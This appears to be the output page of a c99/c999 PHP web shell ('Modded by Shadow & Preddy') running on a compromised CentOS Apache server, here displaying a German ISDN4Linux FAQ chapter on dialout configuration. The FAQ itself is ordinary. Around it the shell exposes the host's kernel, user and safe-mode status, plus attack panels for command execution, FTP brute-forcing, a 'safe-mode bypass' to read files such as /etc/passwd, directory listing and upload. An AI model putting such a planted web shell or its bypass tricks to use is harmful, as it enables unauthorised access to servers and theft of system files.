!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/share/doc/isdn4k-utils-3.2/   drwxr-xr-x
Free 51 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     i4lfaq-de-11.html (13.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
ISDN4LINUX - FAQ (deutsche Version): dialout: Konfiguration des Hinauswählens Next Previous Contents

11. dialout: Konfiguration des Hinauswählens

11.1 dialout_config: Wie richte ich das Hinauswählen richtig ein?

Zuerst musst Du entscheiden wie Du hinauswählen willst. Du wirst Dich da nach Deinem Verbindungspartner richten müssen. Dies sind die hauptsächlichen Möglichkeiten:

  • Sync PPP: Das erwarten die meisten Internet Service Provider von Dir. Siehe Abschnitt syncppp.
  • Async PPP: Kann ebenfalls von Deinem Internet Service Provider benutzt werden. Nimm es, wenn Sync PPP nicht funktioniert. Siehe Abschnitt asyncppp.
  • Raw IP: Am effizientesten für TCP/IP über ISDN. Es bietet sehr schnelles Hinauswählen, ist aber nicht sehr verbreitet. Siehe Abschnitt rawip.
  • X.75: Das brauchst Du zur Einwahl in eine ISDN-Mailbox. Siehe Abschnitt ttyI.
  • Leased line (Standleitung): Zu diesem speziellen Fall siehe Abschnitt leased.

Im Abschnitt dod liest Du wie dial on demand eingerichtet wird - und welche Gefahren es birgt.

Mehr über erweiterte Eigenheiten des Hinauswählens findest Du bei der Frage dialout_advanced.

Du solltest Dir auch den Abschnitt remote ansehen, wenn Du eine Verbindung mit einem speziellen entfernten ISDN-Gerät aufbauen willst.

11.2 dialout_dialmode: Wenn ein IP-Paket über die Verbindung geschickt werden soll (was normalerweise ein Wählen auslöst), bekomme ich im Log nur die Meldung 'dial rejected: interface not in dialmode auto' zu sehen?

Die neuen ISDN-Treiber in 2.0.36 sind auf den manuellen Wählmodus eingestellt, nicht auf die automatische Anwahl. Das wurde gemacht, um unerwartete (und unbemerkte) Wählvorgänge zu verhindern. (Lies den umfangreichen Abschnitt über diese Wähl-vorgänge und ihre Gefahren: dod). Um autodial für ein bestimmtes Interface (z.B. ippp0) einzurichten, nimmst Du den Befehl


isdnctrl dialmode ippp0
auto

Die Bedeutung der Werte für dialmode ist:

off

bewirkt, daß Du (oder das System) keine Verbindung aufbauen kannst (weder eingehende noch ausgehende Verbindungen sind möglich). Benutze diese Option um sicherzustellen, daß keine Verbindungen aufgebaut werden.

auto

bewirkt, daß sich das Interface im automatischen Wählmodus befindet und jedesmal, wenn ein Datenpaket des Netzwerkes den Verbindungsweg des Interfaces benutzen will, eine Verbindung aufbauen wird. Du solltest beachten, daß das unerwartete Wählvorgänge auslösen und zu einer hohen Telefonrechnung führen kann! Das kann durch einige demons oder andere PCs, die auf das Interface zugreifen, ausgelöst werden. Eingehende Anrufe sind ebenfalls möglich.

manual

(VOREINSTELLUNG) ist ein Wählmodus, der dazu geschaffen wurde, die unerwarteten Verbindungsaufbauten zu verhindern. In diesem Modus wird das Interface nie eine Verbindung von selbst aufbauen. Du musst die Verbindung explizit mit:


isdnctrl dial ippp0

aufbauen. Zum Beenden der Verbindung schreibst Du:
isdnctrl hangup ippp0

. Beachte bitte, daß huptimeout die Verbindung trotzdem automatisch beendet! Du musst dies mit:
isdnctrl huptimeout ippp0 0

abstellen, um sicherzustellen, daß die Verbindung nur durch manuelles Auflegen beendet wird.

Wie Du einem normalen Benutzer das Hinauswählen gestattest, erfährst Du bei der Frage dialout_permission.

11.3 dialout_advanced: Welche speziellen Leistungsmerkmale des Hinauswählens gibt es?

Sieh Dir diese speziellen Leistungsmerkmale an:

  • Spare Geld, indem Du kurz vor dem nächsten Gebührenimpuls einhängst: Siehe Abschnitt chargeint.
  • Gleichzeitige Verbindungen auf mehr als einem Kanal: Siehe Abschnitt 2channel.
  • Hinauswahl auf einem bestimmten Kanal: see question dialout_fixedchannel.
  • Rückruf: Siehe Abschnitt callback.

11.4 dialout_permission: Wie gestatte ich einem normalen Nutzer, Verbindungen aufzubauen?

Der Gebrauch von ISDN hängt ab von den Benutzerrechten an den Devices /dev/ttyI* und /dev/cui*. Du hast mehrere Möglichkeiten, um gezielt Nutzern ISDN Verbindungen zu erlauben.

  1. Du kannst die Gruppe 'isdn' in /etc/group erstellen und dann:
    chgrp isdn /dev/ttyI* /dev/cui*
    chmod o-rw /dev/ttyI* /dev/cui*
    

    eingeben. Es wird berichtet, daß Du ebenfalls bei den Programmen ipppd und isdnctrl die Gruppe und die Benutzerrechte auf "isdn" setzen musst. Dann haben alle Nutzer, die nicht in der Gruppe "isdn" sind, keine Schreib- oder Leserechte für die ISDN ttys. Diejenigen, die ISDN benutzen dürfen, müssen explizit in die Gruppe 'isdn' aufgenommen werden.
  2. Du kannst festlegen, daß nur root hinauswählen darf, jedoch Ausnahmen für andere Nutzer mit su1 schaffen (siehe man su1). Editiere als root /etc/su1.priv. Füge diese Zeilen hinzu, wenn sie (oder ähnliche) nicht schon vorhanden sind, und erlaube damit den Nutzern XXXX und YYYY das Wählen und Auflegen:
    # log all dialouts in syslog
    syslog all
    define PPPUSER XXXX YYYY
    alias dial /sbin/isdnctrl dial ippp0
    alias hangup /sbin/isdnctrl hangup ippp0
    ask never
    allow PPPUSER prefix dial
    allow PPPUSER prefix hangup
    

    Dann erstelle zwei Links für dial und hangup:
    ln -s /usr/bin/su1 /usr/local/bin/dial
    ln -s /usr/bin/su1 /usr/local/bin/hangup
    

    Nun können die Nutzer XXXX und YYYY mit der Eingabe von dial hinauswählen und mit hangup auflegen.
  3. Wenn Du nur einen User für die ISDN-Aktionen benutzt, kannst Du ihn zum Eigentümer des ISDN-Interfaces machen.

11.5 dialout_manycards: Wie konfiguriere ich die Hinauswahl mit mehr als einer ISDN-Karte?

Es gibt mehrere Möglichkeiten, die Hinauswahl einzurichten.

  • Hinauswahl auf irgendeiner Karte (Voreinstellung: alle verfügbaren Karten bilden einen Pool, zur Hinauswahl wird eine MSN benutzt): Konfiguriere Deine Karten einfach in der Reihenfolge, die zum Wählen benutzt werden soll. Zuerst werden alle Kanäle der ersten Karte benutzt, dann alle Kanäle der zweiten Karte, usw. Beachte bitte, daß das Netz-Interface oder das ttyI-Device versuchen wird, auf allen Karten die ihm zugeordnete MSN zu benutzen, sogar auf den Karten, denen diese MSN nicht zugewiesen wurde! In diesem Fall wird die Telefongesellschaft diese ungültige MSN durch die korrekte MSN ersetzen. Mit dem Befehl isdnctrl mapping stellst Du die korrekten MSNs ein (siehe Punkt "Hinauswahl mit einer bestimmten Karte").
  • Hinauswahl auf einem bestimmten Kanal: Zur Angabe, welcher Kanal benutzt werden soll, dient der Befehl isdnctrl bind (nicht pppbind). Dieser Befehl sollte erst erfolgen, wenn die komplette Konfiguration mittels isdnctrl durchgeführt wurde. Mit isdnctrl list prüfst Du die Anbindung.
  • Hinauswahl mit einer verschiedenen MSN für jede Karte: Du stellst dies ein mit dem Befehl isdnctrl mapping. Definiere einfach eine Zuordnung der Ziffern 0 bis 9 zu den MSN's, etwa so:
    isdnctrl mapping <carddriver1> 111,222,333,,
    isdnctrl mapping <carddriver2> 999,888,,777
    

    Jetzt könntest Du bei der Konfiguration die Telefonnummer 0 verwenden, wenn Du eigentlich auf <carddriver1> die MSN 111 oder auf <carddriver2> die MSN 999 meinst. (Weil aber 0 eine besondere Bedeutung hat, versuche die Nummer 0 nicht zu benutzen.). Konfiguriere zum Beispiel für die Telefonnummer die 1, wenn Du tatsächlich die MSN 222 auf <carddriver1> oder MSN 888 auf <carddriver2> benutzen möchtest. Konfiguriere für die Telefonnummer die 2, wenn Du tatsächlich die MSN 333 auf <carddriver1> benutzen möchtest (<carddriver2> wird bei Benutzung die standardmässige MSN verwenden.). Konfiguriere für die Telefonnummer 3, wenn Du tatsächlich die MSN 777 auf <carddriver2> benutzen möchtest <carddriver1> wird bei Benutzung die standardmässige MSN verwenden.).
  • Hinauswahl mit einer bestimmten Karte: Nach Installation eines Patches gegen Kernel 2.2.12, den Karsten Keil auf der Mailingliste zur Verfügung stellte, kannst Du mit den Funktionen des Befehls isdnctrl mapping das Wählen mit einigen Karten verhindern.
    isdnctrl mapping <carddriver1> 111,222,333,-,
    isdnctrl mapping <carddriver2> 999,888,-,777
    

    Das funktioniert wie in "Hinauswahl mit einer verschiedenen MSN für jede Karte" beschrieben, das "-" bewirkt jedoch, daß das Wählen nicht erlaubt ist. Das Wählen mit Telefonnummer 2 wird nun nur mit der MSN 333 mit <carddriver1> durchgeführt, während das Wählen mit der Nummer 3 nur mit MSN 777 mit <carddriver2> geschieht.

11.6 dialout_fixedchannel: Wie erreiche ich, daß HiSax immer auf einem bestimmten B-Kanal hinauswählt?

HiSax besitzt dafür eine undokumentierte Eigenschaft. Setze 'P1' vor die zu wählende Telefonnummer für den ersten und 'P2' für den zweiten B-Kanal; ungefähr so:


isdnctrl addphone <device> out P1<your_out_number>

Bedenke, daß in diesem Fall ein Hinauswählen mißlingt, wenn ein anderes Gerät (Telefon, Fax) bereits den entsprechenden Kanal belegt.

11.7 dialout_dynip: Wie finde ich bei dynamischer IP-Vergabe heraus, welche IP zur Hinauswahl benutzt wird?

Erstelle ein Script mit Namen ip-up. Das wird (mit den entsprechenden Parametern) bei jedem Verbindungsaufbau vom ipppd aufgerufen. Die IP-Adresse steht dort als vierter Parameter ($4).

11.8 dialout_bind: Wegen einer DNS-Anfrage wählt bind hinaus. Warum benötigt die Antwort bis zu einer Minute? Gibt es dafür ein Workaround?

Du benutzt vermutlich den Name-Server im 'forward' Modus und Dein ISP arbeitet mit dynamischen IPs. Die erste UDP-Anfrage geht verloren, da sie die falsche IP-Adresse besitzt. Leider wartet bind eine volle Minute bevor es die Anfrage wiederholt.

Als Workaround kannst Du 4 mal die gleiche Adresse in named.conf eintragen und erreichst so, daß eine kürzere Wiederholungszeit (im 'forward' Modus wiederholt bind seine Anfragen nach folgendem Zeitschema: 60 Sekunden geteilt durch die Anzahl der Nameserver in der Sektion "forwarders" der named.conf).


forwarders { 10.0.0.40; 10.0.0.40; 10.0.0.40; 10.0.0.40; }

Bind wird dann die Anfrage alle 15 Sekunden wiederholen (in diesem Fall an 10.0.0.40). Das gleiche Prinzip gilt für zwei oder mehr Adressen. Weitere Möglichkeiten sind die Programme ip_resend und ip_resend_wakeup die Du bei http://www.baty.hanse.de/ip_resend/ findest.


Next Previous Contents

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0051 ]--